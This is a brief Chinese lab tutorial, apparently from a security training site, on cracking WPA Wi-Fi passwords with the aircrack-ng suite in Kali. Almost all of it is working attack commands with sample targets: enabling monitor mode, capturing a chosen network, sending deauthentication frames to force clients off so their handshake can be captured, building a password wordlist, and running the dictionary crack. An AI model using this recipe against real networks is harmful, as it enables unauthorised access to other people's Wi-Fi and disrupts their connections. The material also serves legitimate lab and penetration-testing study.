WIFI爆破

22 阅读1分钟

硬件准备

  • 需要购买无线网卡(2.4GHz/5GHz):

    • 可以接入kali
    • 推荐买免驱款

实验步骤

  • 插入无线网卡,接入kali系统
  • 查看无线网卡信息
  1. iwconfig

image.png

  • 开启无线网卡,启动监听模式
  1. airmon-ng start 无线网卡名词

image.png

  • 确认无线网卡状态

image-20240314153634428

  • 开启扫描,扫描网络中可以WIFI
  1. airodump-ng 无线网卡名词
  2. airodump-ng wlan0mon

image.png

image.png

image.png

  • 扫描指定WIFI
  1. airodump-ng -w 文件存储路径 -c 目标信道 --bssid 目标WIFI设备MAC 无线网卡名词
  2. airodump-ng -w /woniuxy -c 11 --bssid F4:6D:2F:45:73:62 wlan0mon

image.png

  • 强制踢用户下线,迫使用户重新登录,趁机抓取握手报文
  1. aireplay-ng -0 次数 -c 目标客户端设备MAC -a 目标WIFI设备MAC 网卡名称
  2. aireplay-ng -0 10 -c 72:CE:23:DF:B7:E9 -a F4:6D:2F:45:73:62 wlan0mon

image.png

  • 查看并解压kali自带数据字典
  1. #查看rockyou.txt.gz
  2. ls /usr/share/wordlists
  3. #解压
  4. gzip -d /usr/share/wordlists/rockyou.txt.gz
  • 创建数据字典
  1. echo 123456 >> /pw.txt
  2. echo 654321 >> /pw.txt
  3. echo ad123 >> /pw.txt
  4. echo admin >> /pw.txt
  5. echo p-0p-0p-0 >> /pw.txt
  6. echo woniu >> /pw.txt
  7. echo woniu123 >> /pw.txt
  8. echo Woniuxy >> /pw.txt
  9. echo Woniuxy123 >> /pw.txt
  10. echo w123456 >> /pw.txt
  • 爆破
  1. aircrack-ng -w 数据字典路径 抓到的登录握手数据包.cap
  2. aircrack-ng -w /pw.txt /woniuxy-01.cap

image.png